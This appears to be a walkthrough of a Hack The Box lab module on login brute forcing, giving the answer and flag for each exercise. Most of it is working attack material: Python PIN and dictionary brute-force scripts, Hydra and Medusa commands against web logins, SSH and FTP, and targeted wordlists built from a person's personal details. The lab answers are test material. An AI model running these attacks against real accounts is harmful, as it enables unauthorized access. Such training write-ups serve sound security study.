LOGIN BRUTE FORCING

BRUTE FORCE ATTACKS

After successfully brute-forcing the PIN, what is the full flag the script returns?

root@htb:~$ nano pinSolver
import requests

ip = "83.136.251.210"  # Change this to your instance IP address
port = 45104       # Change this to your instance port number

# Try every possible 4-digit PIN (from 0000 to 9999)
for pin in range(10000):
    formatted_pin = f"{pin:04d}"  # Convert the number to a 4-digit string (e.g., 7 becomes "0007")
    print(f"Attempted PIN: {formatted_pin}")

    # Send the request to the server
    response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")

    # Check if the server responds with success and the flag is found
    if response.ok and 'flag' in response.json():  # .ok means status code is 200 (success)
        print(f"Correct PIN found: {formatted_pin}")
        print(f"Flag: {response.json()['flag']}")
        break
 
root@htb:~$ python3 pinSolver.py
 ...   
 * Correct PIN found: 2895
   Flag: HTB{Brut3_F0rc3_1s_P0w3rfu1}

DICTIONARY ATTACKS

After successfully brute-forcing the target using the script, what is the full flag the script returns?

root@htb:~$ nano dictionarySolver.py
import requests

ip = "127.0.0.1"  # Change this to target IP
port = 1234       # Change this to target port

# Download a list of common passwords from the web and split it into lines
passwords = requests.get("https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/500-worst-passwords.txt").text.splitlines()

# Try each password from the list
for password in passwords:
    print(f"Attempted password: {password}")

    # Send a POST request to the server with the password
    response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password})

    # Check if the server responds with success and contains the 'flag'
    if response.ok and 'flag' in response.json():
        print(f"Correct password found: {password}")
        print(f"Flag: {response.json()['flag']}")
        break
        
root@htb:~$ python3 dictionarySolver.py
 Correct password found: gateway
 Flag: HTB{Brut3_F0rc3_M4st3r}

BASIC HTTP AUTHENTICATION

After successfully brute-forcing, and then logging into the target, what is the full flag you find?

root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
 * the -s means silent mode. it suppresses the progress bar and error messages, providing a cleaner output
 
root@htb:~$ hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 94.237.55.60 http-get / -s 43574
 * [43574][http-get] host: 94.237.55.60   login: basic-auth-user   password: Password@123
 
root@htb:~$ BROWSER > http://94.237.55.60:43574
 * basic-auth-user:Password@123
    - HTB{th1s_1s_4_f4k3_fl4g}
 * ALT: curl -u basic-auth-user:'Password@123' 94.237.55.60:43574

After successfully brute-forcing, and then logging into the target, what is the full flag you find?

#analyze the form's structure & behavior to identify the parameter to use
root@htb:~$ BROWSER > {targetSite:Port} > Right-Click > View Page Source
 * ALT: curl -v {targetSite:Port}
 * ALT: Browser Dev Tools > Network Tab
    - find the request corresponding to the form submission and check the form data, headers, and the server’s response
 * ALT: Burp Suite
 
 * identified parameter info
    - The POST method indicates that data is being sent to the server to create or update a resource
    - username and password

#provide invalid input to identify failure or success conditions
root@htb:~$ BROWSER > {targetSite:Port}
 username field: admin
 password field: password 

#construct the params string and condition string
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt

root@htb:~$ hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 94.237.59.180 -s 55833 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials" -t 64
 * the -f option will stop hydra after the first successful login
 * the -s option is used to specify an alternative port
 * the -t option identifies the number of parallel threads to use; default 16

 * [55833][http-post-form] host: 94.237.59.180   login: admin   password: zxcvbnm

#crafting the correct params string is crucial for a successful Hydra attack
  - Hydra's http-post-form service is specifically designed to target login forms. It enables the automation of POST requests, dynamically inserting username and password combinations into the request body. In hydra's http-post-form module, success and failure conditions are crucial for properly identifying valid and invalid login attempts. 
     - the F= determines when a login attempt has failed
        - the failure condition checks for a specific string in the server's response
	   - e.g., 'invalid username or password'
	      - hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
     - the S= indicates when a login is successful
        - the success condition also checks for a specific string in the server's response
	   - e.g., '302 or dashboard or welcome'
	      - hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
	
root@oco:~$ BROWSER > {targetSite:port}
 admin:zxcvbnm

 * HTB{W3b_L0gin_Brut3F0rc3}

WEB SERVICES

What was the password for the ftpuser?

root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt

root@htb:~$ medusa -h 83.136.254.158 -n 42467 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
 * ACCOUNT FOUND: [ssh] Host: 83.136.254.158 User: sshuser Password: 1q2w3e4r5t [SUCCESS]

root@htb:~$ ssh [email protected] -p 42467
 * -p is used as the target uses a non-default port for ssh
 
sshuser@target:~$ netstat -natup | grep -i LISTEN
 tcp        0      0 0.0.0.0:22              0.0.0.0:*          LISTEN      -                   
 tcp6       0      0 :::22                   :::*               LISTEN      -                   
 tcp6       0      0 :::21                   :::*               LISTEN      -
sshuser@target:~$ nmap localhost
 PORT   STATE SERVICE
 21/tcp open  ftp
 22/tcp open  ssh
sshuser@target:~$ ls /home
 * ftpuser  sshuser

sshuser@target:~$ medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5
 * ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
 * the -h 127.0.0.1: Targets the local system, as the FTP server is running locally. Using the IP address tells medusa explicitly to use IPv4 and NOT IPv6. 
 
sshuser@target:~$ ftp ftp://ftpuser:qqww1122@localhost
ftp> help
ftp> ls
 * flag.txt
ftp> more flag.txt
 * ALT: get flag.txt
 * HTB{SSH_and_FTP_Bruteforce_Success}

After successfully brute-forcing the ssh session, and then logging into the ftp server on the target, what is the full flag found within flag.txt?

root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt

root@htb:~$ medusa -h 83.136.254.158 -n 42467 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
 * ACCOUNT FOUND: [ssh] Host: 83.136.254.158 User: sshuser Password: 1q2w3e4r5t [SUCCESS]

root@htb:~$ ssh [email protected] -p 42467
 * -p is used as the target uses a non-default port for ssh
 
sshuser@target:~$ netstat -natup | grep -i LISTEN
 tcp        0      0 0.0.0.0:22              0.0.0.0:*          LISTEN      -                   
 tcp6       0      0 :::22                   :::*               LISTEN      -                   
 tcp6       0      0 :::21                   :::*               LISTEN      -
sshuser@target:~$ nmap localhost
 PORT   STATE SERVICE
 21/tcp open  ftp
 22/tcp open  ssh
sshuser@target:~$ ls /home
 * ftpuser  sshuser

sshuser@target:~$ medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5
 * ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
 * the -h 127.0.0.1: Targets the local system, as the FTP server is running locally. Using the IP address tells medusa explicitly to use IPv4 and NOT IPv6. 
 
sshuser@target:~$ ftp ftp://ftpuser:qqww1122@localhost
ftp> help
ftp> ls
 * flag.txt
ftp> more flag.txt
 * ALT: get flag.txt
 * HTB{SSH_and_FTP_Bruteforce_Success}

CUSTOM WORDLISTS

After successfully brute-forcing, and then logging into the target, what is the full flag you find?

#create the custom target username
root@oco:~$ sudo apt install ruby -y
root@oco:~$ git clone https://github.com/urbanadventurer/username-anarchy.git
root@oco:~$ cd username-anarchy
root@oco:~$ ./username-anarchy -l
root@oco:~$ ./username-anarchy Jane Smith > jane_smith_usernames.txt
root@oco:~$ cat jane_smith_usernames.txt

#create the custom target password
root@oco:~$ sudo apt search cupp
root@oco:~$ sudo apt install cupp
root@oco:~$ cupp -i
 * the -i option runs cupp in interactive mode
    - in this mode, CUPP will guide you through a series of questions about your target
 > First Name: Jane
 > Surname: Smith
 > Nickname: Janey
 > Birthdate (DDMMYYYY): 11121990

 > Partners) name: Jim
 > Partners) nickname: Jimbo
 > Partners) birthdate (DDMMYYYY): 12121990

 > Child's name:
 > Child's nickname:
 > Child's birthdate (DDMMYYYY):

 > Pet's name: Spot
 > Company name: AHI

 > Do you want to add some key words about the victim? Y/[N]: y
 > Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: hacker,blue
 > Do you want to add special chars at the end of words? Y/[N]: y
 > Do you want to add some random numbers at the end of words? Y/[N]:y
 > Leet mode? (i.e. leet = 1337) Y/[N]: y

 [+] Now making a dictionary...
 [+] Sorting list and removing duplicates...
 [+] Saving dictionary to jane.txt, counting 46790 words.
 [+] Now load your pistolero with jane.txt and shoot! Good luck! 
 ...

#tailor the password to the organization's password list (if known)
 Minimum Length: 6 characters
 Must Include:
  At least one uppercase letter
  At least one lowercase letter
  At least one number
  At least two special characters (from the set !@#$%^&*)
  
#
root@oco:~$ grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > jane-filtered.txt
 * the '^.{6,}$' is a filter for at least 6 character passwords
 * the '[A-Z]' is a filter for at least one uppercase letter
 * the '[a-z]' is a filter for at least one lowercase letter
 * the '[0-9]' is a filter for at least one number
 * the '([!@#$%^&*].*){2,}' is a filter for at least two special characters from the set !@#$%^&*)

root@oco:~$ hydra -L jane_smith_usernames.txt -P jane-filtered.txt 83.136.250.185 -s 35525 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials" -t 64
 * [35525][http-post-form] host: 83.136.250.185   login: jane   password: 3n4J!!

root@oco:~$ BROWSER > {targetSite:Port}
 * HTB{W3b_L0gin_Brut3F0rc3_Cu5t0m}

PreviousSERVER-SIDE ATTACKS NextBROKEN AUTHENTICATION

Last updated 3 months ago

BRUTE FORCE ATTACKS

DICTIONARY ATTACKS

BASIC HTTP AUTHENTICATION

LOGIN FORMS

WEB SERVICES

CUSTOM WORDLISTS